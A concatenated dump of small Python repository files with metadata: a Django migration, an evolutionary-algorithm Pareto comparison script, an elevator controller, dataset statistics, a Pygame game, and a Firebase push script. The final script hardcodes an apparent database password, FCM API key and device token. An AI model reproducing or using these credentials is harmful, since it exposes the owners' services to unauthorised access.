190f9f2f9798cb06301f039f6a63c347cd66d097 | f3ee39e1b9ffd2c51795757111adbaa87b4c7e43 | /index/migrations/0003_auto_20151226_1046.py | 08562129d38d555344e1bd7730161dbbc24ca7ca | [] | no_license | BJChen990/hygiene | 8c2b20cb1c58355f97f947dad21fe9206c2bc8bf | 59b1463beed41529c5c4dc69cba722f6d93fbd09 | refs/heads/master | 2016-09-01T09:01:11.918958 | 2016-01-14T14:10:00 | 2016-01-14T14:10:00 | 48,559,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 468 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-26 10:46
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('index', '0002_auto_20151226_1022'),
]
operations = [
migrations.AlterField(
model_name='student',
name='date_schedule',
field=models.TextField(default='{}', max_length=60),
),
]
| [
"bengjing@gmail.com"
] | bengjing@gmail.com |
e04368a99906c0e1b506b2c4d9fa8333b1f36969 | d6022256f47ba67b5ef82bb6d29572841ac47121 | /hw1d/CompareParetoFronts.py | 00c6f7df59ca07dbf11b507b9decbbaa798e3722 | [] | no_license | Jmgiacone/CS5401 | 7633ff15e8c835a733295ae9a0ba1a4451a90773 | 2c280fff54c16122032ed9211358b207c3747d7c | refs/heads/master | 2020-05-20T17:13:36.330555 | 2017-03-09T22:23:49 | 2017-03-09T22:23:49 | 84,492,926 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,935 | py | import sys
class Genome:
def __init__(self, id, wall_time=0, memory_usage=0, decisions=0):
self.objectives = {"wall_time": wall_time, "memory_usage": memory_usage, "decisions": decisions}
self.id = id
def dominates(self, other_item):
if self != other_item and self.objectives["wall_time"] >= other_item.objectives["wall_time"] \
and self.objectives["memory_usage"] >= other_item.objectives["memory_usage"] \
and self.objectives["decisions"] >= other_item.objectives["decisions"]:
if self.objectives["wall_time"] == other_item.objectives["wall_time"] \
and self.objectives["memory_usage"] == other_item.objectives["memory_usage"] \
and self.objectives["decisions"] == other_item.objectives["decisions"]:
return False
else:
return True
return False
def __str__(self):
return "{}: ({}, {}, {})".format(self.id, self.objectives["wall_time"], self.objectives["memory_usage"],
self.objectives["decisions"])
def __repr__(self):
return self.__str__()
def front1_better_than_front2(front1, front2):
front1_dominates = 0
front2_dominates = 0
for genome1 in front1:
for genome2 in front2:
if genome1.dominates(genome2):
front1_dominates += 1
break
for genome2 in front2:
for genome1 in front1:
if genome2.dominates(genome1):
front2_dominates += 1
break
front1_ratio = front1_dominates / len(front2)
front2_ratio = front2_dominates / len(front1)
return front1_ratio > front2_ratio
def parse_file_to_genome_list(file_in):
x = 0
genome_list = [[]]
for line in file_in:
if line == "\n":
x += 1
genome_list.append([])
elif line[0] != "R":
line = line.rstrip("\n")
genome = Genome(1)
split_list = line.split("\t")
genome.objectives["wall_time"] = float(split_list[0])
genome.objectives["memory_usage"] = float(split_list[1])
genome.objectives["decisions"] = float(split_list[2])
genome_list[x].append(genome)
return genome_list
def measure_diversity(front):
return measure(front, ["wall_time", "memory_usage", "decisions"],
{"wall_time": -150, "memory_usage": -100000, "decisions": 0},
{"wall_time": 100, "memory_usage": 10000, "decisions": 100000})
def measure(front, objectives, mins, maxs):
"""
Calculates the normalized hyper-volume between each point on a Pareto front and its neighbors
Returns the percentage of the total normalized volume NOT taken up by these volumes
A higher return value corresponds to a better distributed Pareto front
front: non-empty list of class objects with an objectives dictionary member variable
objectives: list of objective names (needs to match what's in the individual's objectives dictionary)
mins: dictionary with objective names as keys and the minimum possible value for that objective as values
maxs: dictionary with objective names as keys and the maximum possible value for that objective as values
"""
# This will store the hyper-volume between neighboring individuals on the front; initialize all volumes to 1
volumes = {individual: 1.0 for individual in front}
# There is one more volume of interest than there is points on the front, so associate it with the max value
volumes['max'] = 1.0
for objective in objectives:
# Sort the front by this objective's values
sorted_front = sorted(front, key=lambda x: x.objectives[objective])
# Calculate the volume between the first solution and minimum
volumes[sorted_front[0]] *= float(sorted_front[0]
.objectives[objective]-mins[objective]) / (maxs[objective]-mins[objective])
# Calculate the volume between adjacent solutions on the front
for i in range(1, len(sorted_front)):
volumes[sorted_front[i]] *= float(sorted_front[i].objectives[objective]-sorted_front[i-1]
.objectives[objective]) / (maxs[objective]-mins[objective])
# Calculate the volume between the maximum and the last solution
volumes['max'] *= float(maxs[objective]-sorted_front[-1]
.objectives[objective]) / (maxs[objective]-mins[objective])
# The normalized volume of the entire objective space is 1.0, subtract the volumes we calculated to turn this into
# maximization
return 1.0 - sum(volumes.values())
if len(sys.argv) != 3:
print("Error")
exit(1)
print("Param 1: {}\nParam 2: {}".format(sys.argv[1], sys.argv[2]))
file1 = open(sys.argv[1], "r")
file2 = open(sys.argv[2], "r")
genome_list_1 = parse_file_to_genome_list(file1)
genome_list_2 = parse_file_to_genome_list(file2)
win_ratio_genome_1 = []
win_ratio_genome_2 = []
for run1 in genome_list_1:
wins_1 = 0
for run2 in genome_list_2:
if front1_better_than_front2(run1, run2):
wins_1 += 1
win_ratio_genome_1.append(wins_1 / len(genome_list_2))
for run2 in genome_list_2:
wins_2 = 0
for run1 in genome_list_1:
if front1_better_than_front2(run2, run1):
wins_2 += 1
win_ratio_genome_2.append(wins_2 / len(genome_list_1))
print("\n{}".format(sys.argv[1]))
for wins1 in win_ratio_genome_1:
print(wins1)
print("\n{}".format(sys.argv[2]))
for wins2 in win_ratio_genome_2:
print(wins2)
print("\nFront 1")
for run in genome_list_1:
print("Diversity: {}".format(measure_diversity(run)))
print("\nFront 2")
for run in genome_list_2:
print("Diversity: {}".format(measure_diversity(run)))
| [
"Jmgiacone@gmail.com"
] | Jmgiacone@gmail.com |
5c39f86e48d1800b1cb52805192385f0e3cf3fc5 | 9df1784a03e1a29ce280234c85b4cdb9074bb5ce | /uglyFinish/slaveMain.py | 3ea82e27be98fea8f567af493a2ea06c0e0475b5 | [] | no_license | haakoneh/TTK4145_Project | 1542b8b92645ff647e838072de4134635ffb3c8c | 541e67f40b567588aeae81a995cd2fadf83d7ba8 | refs/heads/master | 2021-01-10T11:00:50.398997 | 2017-03-07T11:57:47 | 2017-03-07T11:57:47 | 55,074,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,031 | py | from elev import Elevator
import request_list
from request_list import Request_List
from channels import INPUT, OUTPUT
from elevator_panel import Elevator_Panel
from timer import *
import time
import slaveNetwork
from globalFunctions import *
from MessageFormatHandler import *
from colors import *
networkAliveFlag = True
printString = ""
prevPrintString = ""
def openDoor(timer, elevator):
global printString
printString += "\n" + "At requested floor"
timer.resetTimer()
elevator.stop()
printString += "\n" + "Doors open"
elevator.setDoorLamp(1)
def sendState(elev, requestList, prevState, msgEncoder, msgBuffer):
global printString
state = [-1 , -1, -1]
state[0] = elev.getCurrentFloor()
if(requestList.isRequests()):
state[1] = elev.getMotorDirection()
else:
state[1] = OUTPUT.MOTOR_STOP
state[2] = requestList.furthestRequestThisWay() #furthest floor
state += requestList.getGlobalFromLocal()
if prevState != state:
prevState = state
msg = msgEncoder.encode("state", prevState)
if not msg in msgBuffer:
printString += "\n" + 'newState'
msgBuffer.append(msg)
return msgBuffer, prevState
def updatePendingRequests(requestList, newData):
"""we completely replace pendingRequestlist when master tells us to"""
requestList = newData
def stopAndRemoveRequests(elev, msgBuffer, msgEncoder, requestList):
hallRequests = requestList.removeAndReturnRequestsForDirection(elev.current_floor)
print "hallRequests: ", hallRequests
for request in hallRequests:
if request and request[0] != INPUT.BUTTON_IN:
print "sending remove message to master:\n\tmsg: {}".format(msgEncoder.encode("removePending", request))
msg = msgEncoder.encode("removePending", request)
if(msg not in msgBuffer):
msgBuffer.append(msgEncoder.encode("removePending", request))
print '\033[93m' + "in stopandremove\nmsgBuffer: {}".format(msgBuffer) + '\033[0m'
return msgBuffer
def runElevator(masterIP, port):
global printString, prevPrintString
slave = slaveNetwork.Slave(masterIP, port)
elevIP = getMyIP()
elev = Elevator()
elevPanel = Elevator_Panel(elev)
elevPanel.turnOffAllLights()
requestList = Request_List(elev, 'requestListFile.txt')
globalRequestList = Request_List(elev, 'globalRequestListFile.txt')
pendingRequests = Request_List(elev, 'pendingRequests.txt')
requestList.addListToRequestList(pendingRequests.list)
floorStopTimer = TimerElev()
msgEncoder = MessageEncoder()
msgParser = MessageParser()
msgBuffer = []
prevState = [-1, -1, -1]
elev.setSpeed(300)
currentFloor = -1
while elev.getFloorSensorSignal() == -1:
time.sleep(0.1)
if ((elev.getFloorSensorSignal() != currentFloor)):
currentFloor = elev.getFloorSensorSignal()
printString += "\n" + "elev.curr: " + str(currentFloor) + " getfloor: " + str(elev.getFloorSensorSignal())
prevState = [elev.getCurrentFloor(), elev.getMotorDirection(), 0]
msg = msgEncoder.encode("state", prevState)
msgBuffer.append(msg)
elev.stop()
while slave.alive:
if connectionLost(elevIP): break
printString = ""
#check for request
requestList.addRequest()
printString += "\nglobal list:\n{}\n\n".format(requestList.globalList)
"""This is where we send requests to master"""
globalRequest = requestList.getGlobalRequest()
if globalRequest:
msg = msgEncoder.encode("request", globalRequest)
if not msg in msgBuffer:
msgBuffer.append(msg)
printString += "\n" + "Slave sending: {}".format(msg)
msgBuffer, prevState = sendState(elev, requestList, prevState, msgEncoder, msgBuffer)
"""recieve from master"""
printString += "\n \t\t\tID: {}".format(slave.getSlaveID())
receivedMessage = slave.receive()
print "recievedMessage: ".format(receivedMessage)
if receivedMessage != None and receivedMessage != " ":
try:
masterMessage = json.loads(receivedMessage)
except:
cprint("json.loads error", WARNING)
slave.handleLossOfMaster()
continue
#printString += "\n" + 'masterMessage: ' + str(masterMessage['msgType'])
if masterMessage['msgType'] == 'request':
#printString += "Recieved global request from master {}".format(masterMessage["content"])
printString += "Recieved global request from master {}".format(masterMessage["content"])
"""change this function to do smart stuf"""
#requestList.addGlobalRequest(request)
requestList.addGlobalRequest(map(int, masterMessage['content'].split(' ')))
elif masterMessage['msgType'] == 'elev_id':
if slave.getSlaveID() != int(masterMessage['content']):
slave.setSlaveID(int(masterMessage['content']))
#New stuff related to pending request added here
#######################################################
elif masterMessage['msgType'] == 'pendingRequests':
print "\n\t\t\t****pendingRequests: {}".format(pendingRequests.list)
msg = msgParser.parse(masterMessage)
print "msgtype == pending, masterMessage: {}\nmasterMessage parsed: {}".format(masterMessage, msg)
pendingRequests.list = msg
print "\n\t\t\t****pendingRequests: {}".format(pendingRequests.list)
updatePendingRequests(pendingRequests, pendingRequests.list)
print "\nAttempting to update pending requestfile"
pendingRequests.updateRequestFile()
elif masterMessage["msgType"] == "slaveLost":
cprint("slaveLost:\nRequestlist before merge: ".format(requestList.list), BLUE)
requestList.addListToRequestList(pendingRequests.list)
cprint("Requestlist after merge: ".format(requestList.list), BLUE)
#######################################################
else:
printString += "\n" + 'unknown msg from master'
# except:
else:
# printString += '\nexcept for masterMessage\n with message: {}'.format(receivedMessage)
printString += "received none"
elevPanel.updateLightsByRequestList(requestList.list, pendingRequests.list)
#more requests ahead
#no orders
#we're at a floor, we check if we should stop here
if(elev.getFloorSensorSignal() != -1):
if(elev.getFloorSensorSignal() != currentFloor):
current_floor = elev.getFloorSensorSignal()
elev.setCurrentFloor(current_floor)
elev.setFloorIndicator(elev.getCurrentFloor())
"""this is where we update and send state"""
msgBuffer, prevState = sendState(elev, requestList, prevState, msgEncoder, msgBuffer)
if requestList.isRequestsatFloor(elev.current_floor):
if(requestList.isRequestAtFloorAndDirection(elev.current_floor)) or elev.checkEndPoints() or requestList.furthestRequestThisWay() == elev.getCurrentFloor():
msgBuffer = stopAndRemoveRequests(elev, msgBuffer, msgEncoder, requestList)
openDoor(floorStopTimer, elev)
elif requestList.furthestRequestThisWay() == elev.getCurrentFloor() or elev.checkEndPoints():
requestList.removeRequestsAtFloor(elev.getCurrentFloor())
openDoor(floorStopTimer, elev)
#printString += "\n*********\nreqList:\n{}\n\n".format(requestList.list)
printString += "\nlocal list:\n{}\n\n".format(requestList.list)
if msgBuffer:
slave.send(msgBuffer.pop(0))
else:
slave.sendPing()
if printString != prevPrintString:
print printString
prevPrintString = printString
if elev.getStopSignal():
elev.stop()
break
print "direction: {}\tlocal requests: {} pending: {}".format(elev.direction, requestList.list,pendingRequests.list)
if floorStopTimer.getTimeFlag():
if floorStopTimer.isTimeOut(1):
printString += "\n" + "Doors close"
elev.setDoorLamp(0)
else:
time.sleep(0.1)
continue
if requestList.requestsAhead():
elev.setMotorDirection(elev.direction)
#there are requests, but not ahead
elif requestList.isRequests():
elev.reverseElevDirection()
# elev.setMotorDirection(OUTPUT.MOTOR_STOP)
# elev.stop()
# elev.direction = OUTPUT.MOTOR_STOP
# else:
# if(elev.getFloorSensorSignal() != -1):
# elev.setMotorDirection(OUTPUT.MOTOR_STOP)
# elev.current_floor = elev.getFloorSensorSignal()
#time.sleep(0.01)
runPythonScript("main.py") | [
"sales@scrapeitout.com"
] | sales@scrapeitout.com |
e61eef63934fe5ca612a7bc8d66138ff90376fc9 | c689b1e632ed1e53dcdaa24a8e4e9c8128fb12f3 | /functions/countPercentage.py | 63c0e2cdda048a2a84de1ed57e4c27a42f359f7f | [] | no_license | ngowilliam1/anom_detection | d7f64a3e37e5db04fdc66765666322a51d0e6fdb | 854bfef4204888b4c50d9d3d0506c20dcb4de506 | refs/heads/master | 2022-07-17T08:52:10.564469 | 2020-05-14T15:27:11 | 2020-05-14T15:27:11 | 263,951,915 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,345 | py | import numpy as np
import pandas as pd
import pickle
datasets = ['credit','kdd','mammography','seismic']
for dataset_name in datasets:
print(f"Currently DS: {dataset_name}")
if dataset_name == 'credit':
name_of_label_var = "Class"
elif dataset_name == 'kdd':
name_of_label_var = "label"
elif dataset_name == 'mammography' or dataset_name == 'seismic':
name_of_label_var = "class"
if dataset_name == 'kdd':
pathOfDS = '../data/kddcup.data.corrected'
col_names = ["duration", "protocol_type", "service", "flag", "src_bytes", "dst_bytes", "land", "wrong_fragment",
"urgent", "hot", "num_failed_logins", "logged_in",
"num_compromised", "root_shell", "su_attempted", "num_root", "num_file_creations", "num_shells",
"num_access_files", "num_outbound_cmds",
"is_host_login", "is_guest_login", "count", "srv_count", "serror_rate", "srv_serror_rate",
"rerror_rate", "srv_rerror_rate", "same_srv_rate",
"diff_srv_rate", "srv_diff_host_rate", "dst_host_count", "dst_host_srv_count",
"dst_host_same_srv_rate", "dst_host_diff_srv_rate",
"dst_host_same_src_port_rate", "dst_host_srv_diff_host_rate", "dst_host_serror_rate",
"dst_host_srv_serror_rate", "dst_host_rerror_rate",
"dst_host_srv_rerror_rate", "label"]
df = pd.read_csv(pathOfDS, header=None, names=col_names, index_col=False)
elif dataset_name == 'credit' or dataset_name == 'mammography' or dataset_name == 'seismic' :
pathOfDS = f'../data/{dataset_name}.csv'
df = pd.read_csv(pathOfDS, low_memory=False, index_col=False).rename(columns={name_of_label_var: "label"})
# Changing normal label from -1 to 0
if dataset_name == 'mammography':
df['label'] = df['label'].replace(-1,0)
if dataset_name == 'credit' or dataset_name == 'seismic' or dataset_name == 'mammography':
normal = 0
elif dataset_name == 'kdd':
normal = 'normal.'
labels = df['label'].copy()
is_anomaly = labels != normal
an_mean = is_anomaly.sum() / is_anomaly.count()
an_sum = is_anomaly.sum()
print("Initial Anomalies is: ",an_sum)
print("Initial Normals is: ", (labels == normal).sum())
print("Initial Count is: ", is_anomaly.count())
print("Initial Percent Anomaly is: ", an_mean) | [
"wingo@deloitte.ca"
] | wingo@deloitte.ca |
693a6b56c1dcfa2ea9662fb36b4be998ad33ad48 | b0c391ecf351e2317ac61c257dd6bfa5b10d4015 | /pymotifs/utils/discrepancy.py | ba46d3fcda401c9febc9bcd011eeb1154a72c7ae | [] | no_license | BGSU-RNA/RNA-3D-Hub-core | 57db94bfff9b338b3a751f545699f4117150b921 | 1982e10a56885e56d79aac69365b9ff78c0e3d92 | refs/heads/master | 2023-05-26T09:41:38.397152 | 2023-05-23T05:50:10 | 2023-05-23T05:50:10 | 6,049,336 | 3 | 1 | null | 2022-06-21T21:27:52 | 2012-10-02T18:26:11 | Python | UTF-8 | Python | false | false | 1,617 | py | """This contains some utility functions for dealing with discrepancies.
"""
from pymotifs.constants import MAX_RESOLUTION_DISCREPANCY
from pymotifs.constants import MIN_NT_DISCREPANCY
def should_compare_chain_discrepancy(chain):
"""Check if we can compared discrepancies using this chain.
Parameters
----------
chain : dict
The chain dict to test.
Returns
-------
valid : bool
True if the discrepancy of this chain can be used for comparisions.
"""
return valid_chain(chain)
def should_compute_chain_discrepancy(chain):
"""Check if we should compute the discrepancy using this chain.
Parameters
----------
chain : dict
The chain dict to test.
Returns
-------
valid : bool
True if this chain should have a discrepancy computed using it.
"""
return valid_chain(chain)
def valid_chain(chain):
"""Check if the chain can have a dsicrepancy computed. This means it has
enough nucleotides and it has a good enough resolution, unless it is NMR,
in which case we always allow a discrepancy.
Parameters
----------
chain : dict
The chain dict to test, it should have a 'resolution', 'length' and
'member' entry.
Returns
-------
valid : bool
True if this chain can have a discrepancy computed using it.
"""
if chain['length'] < MIN_NT_DISCREPANCY:
return False
if chain['method'] != 'SOLUTION NMR':
return chain['resolution'] is not None and \
chain['resolution'] <= MAX_RESOLUTION_DISCREPANCY
return True
| [
"blakes.85@gmail.com"
] | blakes.85@gmail.com |
34fd7d5569b9eb07704a2126debed9f16454d87f | bfd4274c3cee5e43f348b24167cc5d294c1a3ae0 | /main.py | 61aa29e83328f3be3728db61002abdb21c2c0ed1 | [] | no_license | GustavoLeao2018/grafos | 43afb51ab67a69af8cd8240d07e9c067b05a2909 | d12af8c5a6cbaff7468cbe96c834fdb0dca03f90 | refs/heads/master | 2020-06-13T15:26:35.527328 | 2019-07-01T14:59:12 | 2019-07-01T14:59:12 | 194,694,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | from grafo import *
from desenha import *
from random import *
grafo = Grafo()
desenha = Desenha()
for i in range(1, 6):
coordenada = (randint(-300,300), randint(-300, 300))
grafo.addVertice(i, coordenada)
for item in grafo.vertices:
if item == 0:
print(item)
print("*"*10)
desenha.desenha(grafo.vertices) | [
"181510004@fspoa.br"
] | 181510004@fspoa.br |
fcd5aea4bef58a9882687de20878935c3a53ac39 | 5d26b8eb8b5c8f6ea61f5b5d09d77985dbba154b | /qlearning/Qlearning_python/qlearning/old/generate_bittrex_histo.py | e761636ea3a35ba2e08a2cc4e454e6f15da8b09a | [] | no_license | atthom/ml_misc | 5d89d333c415d256ad9f274251a7fd1fdb1c547c | 5a0dafdd54e70c57edc2fc4b319eca3d512b1a2f | refs/heads/master | 2021-08-14T20:47:15.644590 | 2017-11-16T18:29:58 | 2017-11-16T18:29:58 | 110,398,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,160 | py | import urllib.request
import shutil
import os
import logging
from datetime import datetime
from datetime import timezone
# https://bittrex.com/Api/v2.0/pub/market/GetTicks?marketName=BTC-WAVES&tickInterval=thirtyMin&_=1499100220008
DOWLOAD_MARKETS = ["BTC-ETH", "BTC-LTC", "BTC-SC", "BTC-DGB", "BTC-DASH", "BTC-STRAT", "BTC-BTS", "BTC-ETC"]
url = "https://bittrex.com/Api/v2.0/pub/market/GetTicks?marketName="
def fetch_market(market: str) -> None:
get = url + market + "&tickInterval=fiveMin"
print(get)
# Download the file from `url` and save it locally under `file_name`:
with urllib.request.urlopen(get) as response:
with open(market + ".history", 'wb') as out_file:
shutil.copyfileobj(response, out_file)
def gettimestamp(dd):
do = datetime.strptime(dd, '%Y-%m-%dT%H:%M:%S')
timestamp = do.replace(tzinfo=timezone.utc).timestamp()
return timestamp
if __name__ == "__main__":
for market in DOWLOAD_MARKETS:
fetch_market(market)
dd = "2017-10-21T22:35:00"
dd1 = "2017-10-22T16:45:00"
dd2 = "2017-11-11T16:30:00"
print(gettimestamp(dd1))
print(gettimestamp(dd2))
| [
"thom.jalabert@gmail.com"
] | thom.jalabert@gmail.com |
807ee32c8630c2047e131faea4a067aa048c1f9f | ae4ec15127a34cfd060b2ba9b93f05a074748121 | /projectSubmission/code/toPytorch.py | 585c3d1c41c4513d0011bbae12cb73009fb8306a | [] | no_license | famishedrover/MCMC-NAS | 4f246a81b996515d503fcb6f29a3e9a5b6fb9c1f | a512e4c186c35028c4aa5de7978ac14800d09c86 | refs/heads/master | 2020-09-13T17:25:43.207382 | 2019-11-23T05:24:28 | 2019-11-23T05:24:28 | 222,853,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,230 | py | from graphGeneration import getFullArch, topsort
from graphPlot import plotUndirected, plotDirected
from neuralnet import unit , runNetwork
# extra imports as backup
import torch
import torch.nn as nn
import torch.nn.functional as F
# To convert the graph to pytorch version :
# 1. Get topsort of the graph from networkx
# 2. Assign Layer to the node in the graph according to the node
# e.g. some internal node is a conv layer etc...
# Conv layer inp and out channels differs depending upon the components <- we attached different components to create a full graph
# 3. Create a ModuleList for this new graph copy and write the forward function for pytorch which is essentially
# traverse the topsort sequentially and any element i requires outputs of parent(i) as input
# ------------------WRITE NETWORKX -> PYTORCH NODE CONVERSION SPECIFIC TO PROBELEM STATEMENT---------------------------
# Try for ImageNet
def giveLayerImageNet(G, node):
pass
# FOR MNIST <- have seperate giveLayers accroding to image input
# The order is by design is such that all 'a' component come first then 'b' so on
def giveLayer(G, node) :
if node == 'Ou' :
G.node[node]['layer'] = unit(8,1)
if node == 'In' :
G.node[node]['layer'] = unit(1,8)
if 'a' in node :
if node in list(G.successors('In')) :
G.node[node]['layer'] = unit(8,8) # start of component
elif node in list(G.predecessors('A')) :
G.node[node]['layer'] = unit(8,16) # end of component
else :
G.node[node]['layer'] = unit(8,8) # continuation of component
if node == 'A' :
G.node[node]['layer'] = unit(16,16,pool=True)
if 'b' in node :
if node in list(G.successors('A')) :
G.node[node]['layer'] = unit(16,32) # start of component
elif node in list(G.predecessors('B')) :
G.node[node]['layer'] = unit(32,16) # end of component
else :
G.node[node]['layer'] = unit(32,32) # continuation of component
if node == 'B' :
G.node[node]['layer'] = unit(16,8,pool=True)
if 'ou' in node :
if node in list(G.successors('B')) :
G.node[node]['layer'] = unit(8,8) # start of component
elif node in list(G.predecessors('Ou')) :
G.node[node]['layer'] = unit(8,8) # end of component
else :
G.node[node]['layer'] = unit(8,8) # continuation of component
if node == 'Ou' :
G.node[node]['layer'] = unit(8,8) # final out will be like (batch,8,x,y)
# list(G_dir.successors(n))
def attachLayerDependingUponNode(G, order):
# dict of (k,v) k=node from networkx, v is actual layer like conv etc..
# For MNIST
# giveLayer = giveLayerMNIST
for node in order :
giveLayer(G, node)
return G
# --------------------------------- SAMPLE RUN-------------------------------------------------------------
# G = getFullArch(3, 300)
# plotDirected(G)
# graphOrder = list(topsort(G))
# # The order is by design is such that all 'a' component come first then 'b' so on
# G = attachLayerDependingUponNode(G,graphOrder)
# print G.nodes.data()
# ---------------------------------DYNAMIC NEURAL NETWORK GEN FROM NETWORKX GRAPH-----------------------------
'''
Main NN module which takes in the attachedLayer networkx Graph and creates the ModuleList Pytorch Network
'''
class Net(nn.Module):
def __init__(self, G):
super(Net, self).__init__()
self.G = G # this is graph with layers attached
self.graphOrder = list(topsort(G)) #save time in topsorting everytime when required, use this <-DO NOT CHANGE THIS ORDER!!! as nodeInNN is orderdependent
self.nodesInNN = nn.ModuleList()
for nod in self.graphOrder :
# print nod
self.nodesInNN.append(G.node[nod]['layer'])
self.fc = nn.Linear(8*7*7, 10) # 3 maxpools cause the final image to be 1,8,7,7
def forward(self, x):
result = {}
for ix, node in enumerate(self.graphOrder) :
# print node
# find pred and get results from pred
# then add those pred
# then supply in the curr node
pred = list(self.G.predecessors(node))
if len(pred) == 0 : # when node == 'In'
result[node] = self.nodesInNN[ix](x)
else :
# get results for each pred and add
# tmp = result[pred[0]]
# for pNode in pred[1:] :
# tmp += result[pNode]
result[node] = self.nodesInNN[ix](*[result[pNode] for pNode in pred])
x = torch.flatten(result['Ou'],1)
output = self.fc(x)
output = F.log_softmax(output, dim=1)
return output
def testMNIST(Net,G):
'''
To test whether the created Net is fine (dimension wise) or not on MNIST input dimen
'''
x = torch.zeros((1,1,28,28))
model = Net(G)
print model(x).shape
# ---------------------------------RANDOM HIT/MISS CODE-------------------------------------------------------------
# nx.readwrite.nx_yaml.write_yaml(G,"model.yaml")
# runNetwork(model)
# nnModelDict = attachLayerDependingUponNode(G, graphOrder)
# making graphOrder as list rather than the generator object is the only useful thing I could find to do with topsort
# Working with networkx graphs sample <- assiging data to nodes
# print graphOrder
# print graphOrder[0]
# G.nodes[graphOrder[0]]['layer'] = 1
# print G.nodes[graphOrder[0]]['layer']
| [
"mudit.verma2014@gmail.com"
] | mudit.verma2014@gmail.com |
a6143cc944275c501610621c02d363694a678572 | b55ebd8d25e2d063c8b758cb8286f2c5b32f2c6e | /contact/urls.py | b8ca20d3701115a380c4390100b65bd300becc31 | [] | no_license | bellarej/django-job-board | ceaedc37b7d4e9d457485d38410023f4aa2c31b5 | 195bfea5e0170191e17d41ea630b0d6bc90f6c7c | refs/heads/master | 2022-12-20T09:48:17.204571 | 2020-09-17T13:53:43 | 2020-09-17T13:53:43 | 293,544,137 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | from django.urls import path, include
from . import views
app_name='contact'
urlpatterns = [
path('', views.send_message, name = 'contact'),
] | [
"bellarej.tarek@gmail.com"
] | bellarej.tarek@gmail.com |
73c443f1b481cf4018913268a23157a8d463c438 | 6a4958b6748f7e3f9382ce106c0f1ed21d4db698 | /alien_invasion.py | 0eda42ba580ca94d65591ad24c9934b37e4c3a46 | [] | no_license | eharbers/Alien_Invasion | 8aa36879681c8bfdc4134734f8e0f0a4f13fe222 | 440277701af476d84c0ab2910e37fd81a59cb6b2 | refs/heads/master | 2016-08-11T08:31:23.387368 | 2016-01-25T19:43:34 | 2016-01-25T19:43:34 | 49,975,687 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 798 | py | import pygame
from pygame.sprite import Group
from settings import Settings
from ship import Ship
import game_functions as gf
def run_game():
# Initialize game, settings and screen object.
pygame.init()
ai_settings = Settings()
screen = pygame.display.set_mode(
(ai_settings.screen_width, ai_settings.screen_height))
pygame.display.set_caption("Alien Invasion")
# Make a ship
ship = Ship(ai_settings, screen)
# Make a group to store bullets in.
bullets = Group()
# Start the main loop for the game.
while True:
gf.check_events(ai_settings, screen, ship, bullets)
ship.update()
bullets.update()
gf.update_bullets(bullets)
gf.update_screen(ai_settings, screen, ship, bullets)
run_game()
| [
"erik.harbers64@gmail.com"
] | erik.harbers64@gmail.com |
a55ec19d3abd4ee61e6b58d78eafa94e90652191 | c10049fe227dce368e9f7138b972cd8141caf77b | /booking/booking/wsgi.py | 6c18fdb09869185ba59ffd0a86846e1747b81bc9 | [] | no_license | mathiasflaatt/booking-project | 0e9cb9ce8b09fd9bc4255a9ab93748755f958c36 | 73548dff229343d75d690b9b65455adc1635ef38 | refs/heads/master | 2022-10-31T10:11:22.514883 | 2016-09-19T13:22:27 | 2016-09-19T13:22:27 | 67,606,885 | 0 | 1 | null | 2022-10-20T22:03:09 | 2016-09-07T13:02:11 | Python | UTF-8 | Python | false | false | 391 | py | """
WSGI config for booking project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "booking.settings")
application = get_wsgi_application()
| [
"Mathiasflaatt@gmail.com"
] | Mathiasflaatt@gmail.com |
6425948003272e8b7845b8b2a02bb4d2ab44b0b5 | e9de2e778bebc8c9d9da4826a6372a462831fb62 | /fcmscriptdb.py | 0a17591b4da1fe06e935cdf1ee6939b98d8a75f6 | [] | no_license | rahulgoyal911/FCMScript | 2c698bb41012fce3e015598c5ded7f7de8033114 | 2f8c21823e4849f0c5f1844b58c48ae8b9b9e7f2 | refs/heads/master | 2020-04-21T23:41:18.961515 | 2019-02-10T14:22:55 | 2019-02-10T14:22:55 | 169,954,334 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 967 | py | # Send to single device.
from pyfcm import FCMNotification
import psycopg2
conn = psycopg2.connect(database = "testdb2", user = "postgresql", password = "namespace1", host = "sample-database.czgprnseypbr.us-east-1.rds.amazonaws.com", port = "5432")
print ('Opened database successfully')
cur = conn.cursor()
cur.execute("SELECT name from COMPANY")
rows = cur.fetchall()
for row in rows:
print ("NAME = ", row[0])
name = row[0]
print ("fetched successfully");
push_service = FCMNotification(api_key="AAAALZRFb04:APA91bEjxns-acpzgQwQK93ePXeb0LfQ6oES0dW7PSTuSE00qzsWhmVqFu4M0O-D6XVH1Cb_XC2miS0AitRImEcRjSEzRKKXJAAbOJg876mOwIY04VdOiZgoi0VL5MoTWmcr1RTpN5ht")
registration_id = "dyWTx-v3YtQ:APA91bHVf4yLwu2HpflWNW9yjVX8G3mZmamMgZjqBV-pPMvQCwAydPuQUrRjxz_OZOgrO_IJr5nq2TMLZtI2fgnAu2oDV1dFvu2RC4hmyiFK2WgdZcdQYPATcbMW3Q_tHXU9D9VrEaWz"
message = name
result = push_service.notify_single_device(registration_id=registration_id, message_body=message)
print (result)
| [
"rahulgoyal0.rg@gmail.com"
] | rahulgoyal0.rg@gmail.com |
